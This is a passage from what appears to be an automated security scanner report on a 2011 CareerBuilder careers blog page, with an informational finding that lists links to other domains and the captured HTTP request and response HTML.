http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1241134192&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314
http://mail.live.com/
http://manpowerblogs.com/holmes/
http://maps.live.com/default.aspx?wip=2&v=2&rtp=~&FORM=MSNH
http://moneycentral.msn.com/
http://moneycentral.msn.com/home.asp
http://movies.redacted/
http://msn.delish.com/
http://msn.foxsports.com/
http://msn.match.com/index.aspx?TrackingID=516163&BannerID=543351
http://msn.whitepages.com/
http://msn/
http://music.redacted/
http://my.redacted/
http://personalbrandingblog.wordpress.com/
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://punkrockhr.com/
http://realestate.redacted/
http://rss.redacted/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript
http://sethgodin.typepad.com/
http://shiftingcareers.blogs.nytimes.com/
http://specials.redacted/alphabet.aspx
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://tech.redacted/
http://tk2.stb.s-redacted/i/96/5146F629B72E6A89B01B5FF61E30B8.gif
http://topsy.com/trackback?url=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F%3Fgt1%3D23000&utm_source=pingback&utm_campaign=L2
http://tv.redacted/
http://twitter.com/CareerBuilder
http://twitter.com/share?url=http://www.theworkbuzz.com/employment-trends/video-interviews/&via=careerbuilder&count=horizontal
http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18
http://weather.redacted/
http://workinretail.com/
http://www.bing.com/travel?cid=msn_careers
http://www.blackcareers.com/
http://www.blogher.com/topic/business-career-personal-finance
http://www.brazencareerist.com/
http://www.careerbuilder.com/?SiteId=workbuzz004
http://www.careerbuilder.com/?lr=workbuzz&siteid=rkbuzzlg
http://www.careerbuilder.com/jobposter/products/page.aspx?pagever=OnlineInterviewsDemo&template=none&cachebypass=ye$
http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003
http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003
http://www.careerhubblog.com/
http://www.careerpath.com/
http://www.careerrookie.com/
http://www.cbinstitute.com/
http://www.cbresume.com/
http://www.cbsalary.com/
http://www.contemporaryconcepts.org/
http://www.degreedriven.com/
http://www.empleoscb.com/
http://www.employmentblawg.com/
http://www.employmentspot.com/
http://www.facebook.com/careerbuilder
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F&layout=button_count&show_faces=false&width=130&action=recommend&font=arial&colorscheme=light&height=20
http://www.fastcompany.com/blogs
http://www.fistfuloftalent.com/
http://www.hillgrp.com/
http://www.huffingtonpost.com/business/
http://www.humancapitalist.com/
http://www.jibberjobber.com/login.php
http://www.jobs.net/
http://www.jobsearchmarketing.com/
http://www.jtodonnell.com/wordpress/
http://www.leapwalking.com/
http://www.momsrising.org/momsblogging/
http://www.redacted/
http://www.msnbc.redacted/
http://www.onlinejobapplicationsblog.com/
http://www.personified.com/
http://www.primecb.com/
http://www.spherioncareerblog.com/
http://www.thefutureofwork.net/blog/
http://www.thehiringsite.com/
http://www.truecareers.com/
http://www.usnews.com/blogs/outside-voices-careers/index.html
http://www.vettannatogo.com/
http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js
http://www.wonderwall.com/
http://yellowpages.msn.com/
https://feedback.redacted/default.aspx?productkey=careers&mkt=en-us

Request

GET /employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:31 GMT
X-Pingback: http://www.theworkbuzz.com/xmlrpc.php
Link: <http://www.theworkbuzz.com/?p=6605>; rel=shortlink
Connection: close
Set-Cookie: WP-Cobrand=msn; expires=Sun, 30-Jan-2011 02:18:52 GMT
Set-Cookie: X-Mapping-caklakng=EC453BC60E321747B8F3814F4BC289A4; path=/
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...
</script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://ads1.redacted/library/dap.js?ver=3.0.4'></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.redacted">MSN home</a></li><li><a href="http://hotmail.msn.com">Mail</a></li><li><a href="http://my.redacted">My MSN</a></li><li class="MSNlast"><a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1241134192&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314"
class="MSNdMSNME_1">Sign in</a>
...[SNIP]...
<li class="MSNfirst MSNselected"><a href="http://health.msn.com">health</a></li><li><a
href="http://moneycentral.redacted">money</a></li><li><a href="http://www.bing.com/travel?cid=msn_careers">
travel</a>
...[SNIP]...
<li><a href="http://tech.redacted/">tech</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://mail.live.com"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Hotmail" /><span>
...[SNIP]...
<li><a href="http://im.live.com/messenger/im/home/?source=MSNTDLINK" id="MSNmsg"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Messenger" /><span>
...[SNIP]...
<li><a href="http://my.redacted"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="My MSN" /><span>
...[SNIP]...
<li class="MSNlast"><a href="http://ie8.redacted/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Internet Explorer 8" /><span>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.bing.com/travel?cid=msn_careers">Airfares & Travel</a>
...[SNIP]...
<li><a href="http://autos.msn.com/default.aspx">Autos</a></li><li><a href="http://careers.msn.com">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://cityguides.redacted">City Guides</a>
...[SNIP]...
<li class="MSNlast"><a href="http://msn.match.com/index.aspx?TrackingID=516163&BannerID=543351 ">Dating & Personals</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://msn.delish.com/">Food & Entertaining</a>
...[SNIP]...
<li><a href="http://games.msn.com">Games</a></li><li><a href="http://health.msn.com">Health & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li class="MSNlast"><a href="http://lifestyle.redacted/default.aspx">Lifestyle</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://maps.live.com/default.aspx?wip=2&v=2&rtp=~&FORM=MSNH">Maps & Directions</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com">Music</a></li><li class="MSNlast"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://realestate.redacted">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://g.redacted/0AD00036/931292.1??HCType=1&CID=931292&PG=SHPHDR">Shopping</a></li><li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://tech.redacted">Tech & Gadgets</a>
...[SNIP]...
<li class="MSNlast"><a href="http://tv.redacted">TV</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://weather.msn.com">Weather</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.wonderwall.com/">Wonderwall</a></li><li><a href="http://yellowpages.redacted">Yellow Pages</a>
...[SNIP]...
<li class="MSNlast"><a href="http://specials.msn.com/alphabet.aspx">MSN Directory</a>
...[SNIP]...
<div id="MSNlogo">
<a href="http://www.redacted">
<img src="http://blstc.redacted/br/gbl/lg/1/l/msft.gif" alt="go to redacted"
width="118" height="35" /></a><a class="MSNname" href="http://careers.msn.com">careers</a>
...[SNIP]...
<span><a href="http://latino.msn.com/empleos/">Español</a>
...[SNIP]...
<div class="facebook_like"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F&layout=button_count&show_faces=false&width=130&action=recommend&font=arial&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="tweet_button">
                    <a href="http://twitter.com/share?url=http://www.theworkbuzz.com/employment-trends/video-interviews/&via=careerbuilder&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="linkedin_share">
                   <script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
<p>Recently, CareerBuilder began offering a tool for <a href="http://www.careerbuilder.com/jobposter/products/page.aspx?pagever=OnlineInterviewsDemo&template=none&cachebypass=ye$">companies to use online video interviews</a>
...[SNIP]...
coming years, we wanted to give you some tips that will put you ahead of other job seekers. To get insight on how a job seeker should approach a video interview, we talked to Jennifer Flaa, the CEO of <a href="http://www.vettannatogo.com/">Vettanna ToGo</a>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18"></script>
...[SNIP]...
<strong><a href='http://www.contemporaryconcepts.org' rel='external nofollow' class='url'>Sandra</a>
...[SNIP]...
<strong><a href='http://www.contemporaryconcepts.org' rel='external nofollow' class='url'>Sandra</a>
...[SNIP]...
<strong><a href='http://www.onlinejobapplicationsblog.com' rel='external nofollow' class='url'>Nick</a>
...[SNIP]...
<strong><a href='http://www.hillgrp.com' rel='external nofollow' class='url'>Francesca</a>
...[SNIP]...
<strong><a href='http://msn' rel='external nofollow' class='url'>LARock</a>
...[SNIP]...
<strong><a href='http://www.contemporaryconcepts.org' rel='external nofollow' class='url'>Sandra</a>
...[SNIP]...
<strong>From <a href='http://topsy.com/trackback?url=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F%3Fgt1%3D23000&utm_source=pingback&utm_campaign=L2' rel='external nofollow' class='url'>Tweets that mention Are you ready for video interviews? : The Work Buzz -- Topsy.com</a>
...[SNIP]...
<div class="textwidget"><a href="http://www.careerbuilder.com?lr=workbuzz&siteid=rkbuzzlg" alt="CareerBuilder.com"><img src="http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif" border="0" /></a>
...[SNIP]...
<li id="twitter-follow"><a href="http://twitter.com/CareerBuilder" rel="external">Twitter</a></li><li id="facebook-follow"><a href="http://www.facebook.com/careerbuilder" rel="external">Facebook</a>
...[SNIP]...
<br>
<img src=http://img.icbdr.com/images/pixel.gif width=1 height=1 vspace=2><br>
...[SNIP]...
<td style=padding-top:8px;>  - <a href="http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003">
           <font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<td style=padding-bottom:12px;>  - <a href="http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003"><font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<div class="textwidget"><a href="http://alltop.com/"><img src="http://badges.alltop.com/images/alltop_170x30_we2.jpg" width="170" height="30" alt="Alltop. We're kind of a big deal." /></a>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<div style="font-size:8px; padding-left:10px"><a href="http://www.facebook.com/careerbuilder">CareerBuilder on Facebook</a>
...[SNIP]...
<li><a href="http://www.blackcareers.com/" title="Black Careers">Black Careers</a>
...[SNIP]...
<li><a href="http://www.careerrookie.com/" title="CBcampus">Career Rookie</a>
...[SNIP]...
<li><a href="http://www.cbinstitute.com" title="CBInstitute">CBInstitute</a>
...[SNIP]...
<li><a href="http://www.cbresume.com" title="cbResume">cbResume</a></li>
<li><a href="http://www.CBSalary.com" title="CBsalary">CBsalary.com</a>
...[SNIP]...
<li><a href="http://www.careerpath.com" title="CareerPath">CareerPath</a>
...[SNIP]...
<li><a href="http://www.degreedriven.com" title="DegreeDriven">DegreeDriven</a>
...[SNIP]...
<li><a href="http://www.empleoscb.com" title="Empleos">Empleoscb</a></li>
<li><a href="http://www.employmentspot.com" title="Employment Spot">Employment Spot</a>
...[SNIP]...
<li><a href="http://www.jobs.net" title="Jobs.net">Jobs.net</a></li>
<li><a href="http://www.personified.com/">Personified</a>
...[SNIP]...
<li><a href="http://www.primecb.com/">PrimeCB</a></li>
<li><a href="http://www.truecareers.com" title="True Careers">True Careers</a>
...[SNIP]...
<li><a href="http://workinretail.com" title="WorkInRetail">WorkInRetail</a>
...[SNIP]...
<li><a href="http://www.thehiringsite.com/">The Hiring Site</a>
...[SNIP]...
<li><a href="http://askamanager.blogspot.com/">Ask A Manager</a>
...[SNIP]...
<li><a href="http://www.spherioncareerblog.com/">Big Time</a></li>
<li><a href="http://www.blogher.com/topic/business-career-personal-finance">BlogHer</a></li>
<li><a href="http://www.brazencareerist.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://www.careerhubblog.com/">CareerHub</a></li>
<li><a href="http://careerealism.wordpress.com/" title="Careerealism">Careerealism</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/laidoff/?mod=blogmod" target="_blank">CareerJournal: Laid Off and Looking</a>
...[SNIP]...
<li><a href="http://manpowerblogs.com/holmes/">Contemporary Working</a>
...[SNIP]...
<li><a href="http://www.employmentblawg.com/">Employment Blawg</a>
...[SNIP]...
<li><a href="http://evilhrlady.blogspot.com/">Evil HR Lady</a>
...[SNIP]...
<li><a href="http://www.fastcompany.com/blogs">Fast Company</a>
...[SNIP]...
<li><a href="http://www.fistfuloftalent.com/">Fistful of Talent</a>
...[SNIP]...
<li><a href="http://blog.generationrelations.com/" title="Generation Relations">Generation Relations</a>
...[SNIP]...
<li><a href="http://hrminion.blogspot.com/">HR Minion</a></li>
<li><a href="http://hrwench.blogspot.com/">HR Wench</a></li>
<li><a href="http://www.huffingtonpost.com/business/">HuffPost Business Blogs</a>
...[SNIP]...
<li><a href="http://www.humancapitalist.com/">Human Capitalist</a>
...[SNIP]...
<li><a href="http://www.jibberjobber.com/login.php">Jibber Jobber</a>
...[SNIP]...
<li><a href="http://www.jobsearchmarketing.com/">JobSearch Marketing Blog</a>
...[SNIP]...
<li><a href="http://www.jtodonnell.com/wordpress/" title="Career Insights">J.T. O’Donnell: Career Insights</a>
...[SNIP]...
<li><a href="http://keppiecareers.wordpress.com/">Keppie Careers</a>
...[SNIP]...
<li><a href="http://www.leapwalking.com/">Leap Walking</a>
...[SNIP]...
<li><a href="http://www.momsrising.org/momsblogging/">Moms Rising</a>
...[SNIP]...
<li><a href="http://blogs.msdn.com/heatherleigh/default.aspx">One Louder</a>
...[SNIP]...
<li><a href="http://www.usnews.com/blogs/outside-voices-careers/index.html">Outside Voices: Careers</a>
...[SNIP]...
<li><a href="http://blog.penelopetrunk.com/">Penelope Trunk</a>
...[SNIP]...
<li><a href="http://personalbrandingblog.wordpress.com/">Personal Branding</a>
...[SNIP]...
<li><a href="http://punkrockhr.com/">Punk Rock HR</a>
...[SNIP]...
<li><a href="http://sethgodin.typepad.com/" title="Seth Godin">Seth Godin</a>
...[SNIP]...
<li><a href="http://shiftingcareers.blogs.nytimes.com/">Shifting Careers</a>
...[SNIP]...
<li><a href="http://www.thefutureofwork.net/blog/">The Future of Work</a>
...[SNIP]...
<li><a href="http://alexandralevit.typepad.com" rel="colleague" target="_blank">Water Cooler Wisdom</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/womenomics/" title="ABC News – Womenomics">Womenomics</a>
...[SNIP]...
<p>© Copyright <a href="http://www.careerbuilder.com/?SiteId=workbuzz004">CareerBuilder.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js"></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://g.redacted/2privacy/enus">MSN privacy</a>
...[SNIP]...
<li><a
href="http://g.redacted/0TO_/enus">Legal</a></li><li><a href="http://advertising.redacted/home/home.asp">
Advertise</a>
...[SNIP]...
<li class="last"><a href="http://rss.redacted">RSS</a>
...[SNIP]...
<li class="MSNfirst"><a onclick="return Msn.Navigation.OpenPopup(this,'width=800,height=600,resizeable=no,status=no,titlebar=no,toolbar=no')"
href="http://careers.msn.com/help.aspx">Help</a></li><li class="MSNlast"><a href="https://feedback.redacted/default.aspx?productkey=careers&mkt=en-us">Feedback</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...

22.488. http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/fun-stuff/your-work-soundtrack/

Issue detail

The page was loaded from a URL containing a query string:

http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js?ver=3.0.4
http://advertising.msn.com/home/home.asp
http://alexandralevit.typepad.com/
http://alltop.com/
http://askamanager.blogspot.com/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/default.aspx
http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://badges.alltop.com/images/alltop_170x30_we2.jpg
http://blog.generationrelations.com/
http://blog.penelopetrunk.com/
http://blogs.abcnews.com/womenomics/
http://blogs.msdn.com/heatherleigh/default.aspx
http://blogs.wsj.com/laidoff/?mod=blogmod
http://blstc.redacted/br/gbl/lg/1/l/msft.gif
http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4
http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4
http://careerealism.wordpress.com/
http://careers.redacted/
http://careers.redacted/help.aspx
http://cityguides.redacted/
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fa-hard-days-night%252Fid402060584%253Fi%253D402060914%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fbang-the-drum-all-day%252Fid107636259%253Fi%253D107636085%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fbig-boss-man%252Fid283284190%253Fi%253D283284203%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Ffor-the-love-of-money%252Fid158960620%253Fi%253D158960641%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fforty-hour-week-for-a-livin%252Fid271622685%253Fi%253D271622700%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fits-my-life%252Fid397237803%253Fi%253D397237927%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fjust-who-i-am-poets-pirates%252Fid262139788%253Fuo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fman-in-the-mirror%252Fid159292399%253Fi%253D159294478%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fmanic-monday%252Fid200007310%253Fi%253D200007628%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fmusique-vol-1-1993-2005%252Fid133708728%253Fuo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fnothin-but-a-good-time%252Fid254242268%253Fi%253D254243956%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fshe-works-hard-for-the-money%252Fid1953992%253Fuo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Ftake-this-job-and-shove-it%252Fid18453611%253Fi%253D18453581%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Ftakin-care-of-business%252Fid342122%253Fi%253D342120%2526uo%253D4%2526partnerId%253D30
http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&offerid=146261&type=3&subid=0&tmpid=1826&RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fworking-on-the-highway%252Fid203708420%253Fi%253D203708785%2526uo%253D4%2526partnerId%253D30
http://evilhrlady.blogspot.com/
http://g.redacted/0AD00036/931292.1??HCType=1&CID=931292&PG=SHPHDR
http://g.redacted/0TO_/enus
http://g.redacted/2privacy/enus
http://games.redacted/
http://health.redacted/
http://hotmail.redacted/
http://hrminion.blogspot.com/
http://hrwench.blogspot.com/
http://ie8.redacted/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A
http://im.live.com/messenger/im/home/?source=MSNTDLINK
http://img.icbdr.com/images/pixel.gif
http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif
http://keppiecareers.wordpress.com/
http://latino.redacted/empleos/
http://lifestyle.redacted/default.aspx
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1241134192&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314
http://mail.live.com/
http://manpowerblogs.com/holmes/
http://maps.live.com/default.aspx?wip=2&v=2&rtp=~&FORM=MSNH
http://moneycentral.msn.com/
http://moneycentral.msn.com/home.asp
http://movies.redacted/
http://msn.delish.com/
http://msn.foxsports.com/
http://msn.match.com/index.aspx?TrackingID=516163&BannerID=543351
http://msn.whitepages.com/
http://music.redacted/
http://my.redacted/
http://personalbrandingblog.wordpress.com/
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://punkrockhr.com/
http://realestate.redacted/
http://rss.redacted/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript
http://sethgodin.typepad.com/
http://shiftingcareers.blogs.nytimes.com/
http://specials.redacted/alphabet.aspx
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://tech.redacted/
http://tk2.stb.s-redacted/i/96/5146F629B72E6A89B01B5FF61E30B8.gif
http://tv.redacted/
http://twitter.com/CareerBuilder
http://twitter.com/share?url=http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/&via=careerbuilder&count=horizontal
http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18
http://weather.redacted/
http://workinretail.com/
http://www.bing.com/travel?cid=msn_careers
http://www.blackcareers.com/
http://www.blogher.com/topic/business-career-personal-finance
http://www.brazencareerist.com/
http://www.careerbuilder.com/?SiteId=workbuzz004
http://www.careerbuilder.com/?lr=workbuzz&siteid=rkbuzzlg
http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003
http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003
http://www.careerhubblog.com/
http://www.careerpath.com/
http://www.careerrookie.com/
http://www.cbinstitute.com/
http://www.cbresume.com/
http://www.cbsalary.com/
http://www.degreedriven.com/
http://www.empleoscb.com/
http://www.employmentblawg.com/
http://www.employmentspot.com/
http://www.facebook.com/careerbuilder
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Ffun-stuff%2Fyour-work-soundtrack%2F&layout=button_count&show_faces=false&width=130&action=recommend&font=arial&colorscheme=light&height=20
http://www.fastcompany.com/blogs
http://www.fistfuloftalent.com/
http://www.fitnessmagazine.com/workout/music/popular-playlists/the-fitness-top-100-workout-songs/
http://www.huffingtonpost.com/business/
http://www.humancapitalist.com/
http://www.jibberjobber.com/login.php
http://www.jobs.net/
http://www.jobsearchmarketing.com/
http://www.jtodonnell.com/wordpress/
http://www.leapwalking.com/
http://www.momsrising.org/momsblogging/
http://www.redacted/
http://www.msnbc.redacted/
http://www.personified.com/
http://www.primecb.com/
http://www.spherioncareerblog.com/
http://www.thefutureofwork.net/blog/
http://www.thehiringsite.com/
http://www.truecareers.com/
http://www.usnews.com/blogs/outside-voices-careers/index.html
http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js
http://www.wonderwall.com/
http://www.youtube.com/watch?v=9N2CANatVYQ
http://www.youtube.com/watch?v=i3MXiTeH_Pg&ob=av2em
http://www.youtube.com/watch?v=q8zx68HENIA
http://yellowpages.msn.com/
https://feedback.redacted/default.aspx?productkey=careers&mkt=en-us

Request

GET /fun-stuff/your-work-soundtrack/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:41 GMT
X-Pingback: http://www.theworkbuzz.com/xmlrpc.php
Link: <http://www.theworkbuzz.com/?p=6495>; rel=shortlink
Connection: close
Set-Cookie: WP-Cobrand=msn; expires=Sun, 30-Jan-2011 02:19:04 GMT
Set-Cookie: X-Mapping-caklakng=46B1EFBB3B916447A34716FB66E1BFF9; path=/
Content-Length: 57465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...
</script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://ads1.redacted/library/dap.js?ver=3.0.4'></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.redacted">MSN home</a></li><li><a href="http://hotmail.msn.com">Mail</a></li><li><a href="http://my.redacted">My MSN</a></li><li class="MSNlast"><a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1241134192&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fcareers.redacted%2F&lc=1033&id=74314"
